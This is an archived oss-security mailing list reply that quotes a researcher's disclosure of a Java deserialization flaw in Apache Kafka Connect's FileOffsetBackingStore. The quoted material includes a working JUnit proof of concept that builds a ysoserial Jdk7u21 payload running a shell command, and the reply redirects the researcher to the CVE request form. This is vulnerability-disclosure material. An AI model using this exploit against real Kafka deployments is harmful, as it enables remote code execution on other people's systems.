[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] CVE-IDs request for Apache Kafka desrialization vulnerability via runtime
From: Salvatore Bonaccorso <carnil () debian ! org>
Date: 2017-07-19 9:15:13
Message-ID: 20170719091513.7qubl5vw3a34jbvi () lorien ! valinor ! li
[Download RAW message or body]
On Wed, Jul 19, 2017 at 09:41:16AM +1000, Hooman Ghasem Broujerdi wrote:
> Hi,
>
> Apache kafka connect-api runtime contains a desrialization vul via
> FileOffsetBackingStore
> which leads to remote code execution, this can be exploited reliably in
> JDK1.7.0_05, below is
> a unit test for it:
>
>
> import junit.framework.Test;
> import junit.framework.TestCase;
> import junit.framework.TestSuite;
> import org.apache.commons.io.FileUtils;
> import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
> import org.apache.kafka.connect.storage.FileOffsetBackingStore;
> import ysoserial.payloads.Jdk7u21;
>
> import java.io.ByteArrayOutputStream;
> import java.io.File;
> import java.io.IOException;
> import java.io.ObjectOutputStream;
> import java.util.HashMap;
> import java.util.Map;
>
> public void test_Kafka_Deser() throws Exception {
>
> StandaloneConfig config;
>
> String projectDir = System.getProperty("user.dir");
>
> Jdk7u21 jdk7u21 = new Jdk7u21();
> Object o = jdk7u21.getObject("touch vul");
>
> byte[] ser = serialize(o);
>
> File tempFile = new File(projectDir + "/payload.ser");
> FileUtils.writeByteArrayToFile(tempFile, ser);
>
> Map<String, String> props = new HashMap<String, String>();
> props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
> tempFile.getAbsolutePath());
> props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
> props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
> props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
> props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
> config = new StandaloneConfig(props);
>
> FileOffsetBackingStore restore = new FileOffsetBackingStore();
> restore.configure(config);
> restore.start();
> }
>
> private byte[] serialize(Object object) throws IOException {
> ByteArrayOutputStream bout = new ByteArrayOutputStream();
> ObjectOutputStream out = new ObjectOutputStream(bout);
> out.writeObject(object);
> out.flush();
> return bout.toByteArray();
> }
Thanks for reaching out the oss-security list. Unfortunately direct
CVE assignments cannot be request anymore through the list, rather
please fill the form at https://cveform.mitre.org/
Once you have the CVE assigned, can you please followup with the
assignement in this thread, so that other are informed about it?
Regards,
Salvatore
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic